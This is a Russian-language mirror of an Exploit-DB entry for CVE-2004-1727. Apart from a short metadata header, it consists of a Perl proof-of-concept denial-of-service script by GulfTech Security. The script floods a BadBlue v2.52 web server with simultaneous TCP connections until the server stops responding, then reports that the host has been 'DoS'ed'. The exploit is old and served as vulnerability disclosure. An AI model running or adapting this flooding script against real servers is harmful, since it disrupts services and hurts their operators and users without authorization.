- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 419
- Проверка EDB
-
- Пройдено
- Автор
- GULFTECH SECURITY
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2004-1727
- Дата публикации
- 2004-08-26
Код:
#!/usr/bin/perl
##############################################################
# BadBlue v2.52 Web Server - Multiple Connections DoS POC Code
##############################################################
# BadBlue Web Server can not handle many simultaneous connects
# from the same host, and will lock up until the connects stop
##############################################################
# This Proof Of Concept Written By GulfTech Security Research
##############################################################
use Strict;
use Socket;
use IO::Socket;
my $host = $ARGV[0];
my $port = $ARGV[1];
my $stop = $ARGV[2];
my $size = 1000;
my $prot = getprotobyname('tcp');
my $slep = $ARGV[3];
printf("================================================ ");
printf(" BadBlue v2.52 Web Server Denial Of Service POC ");
printf("================================================ ");
printf("
Making %d Connections To %s ", $stop , $host);
for ($i=1; $i<$stop; $i++)
{
socket($i, PF_INET, SOCK_STREAM, $prot );
my $dest = sockaddr_in ($port, inet_aton($host));
connect($i, $dest);
}
CheckServer($host, $i, $slep, $stop);
KillThreads($stop);
printf("
Exploit Attempt Unsuccesful");
exit;
sub CheckServer($host, $i, $slep, $stop) {
($host, $i, $slep, $stop) = @_;
$blank = "1512" x 2;
$request = "GET / HTTP/1.0".$blank;
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
Timeout => '10000',
Type => SOCK_STREAM,
);
print $remote $request;
unless ( <$remote> )
{
printf("
Host %s Has Been Successfully DoS'ed ", $host);
printf("
The Host Will Be Down For %d Seconds ", $slep);
sleep($slep);
KillThreads($stop);
exit;
}
}
sub KillThreads($stop) {
$stop = @_;
printf("
Killing All active Connections");
for ($l=1; $l<$stop; $l++) {
shutdown($l,2)|| die("Couldn't Shut Down Socket");
$l++;
}
}
# milw0rm.com [2004-08-26]
- Источник
- www.exploit-db.com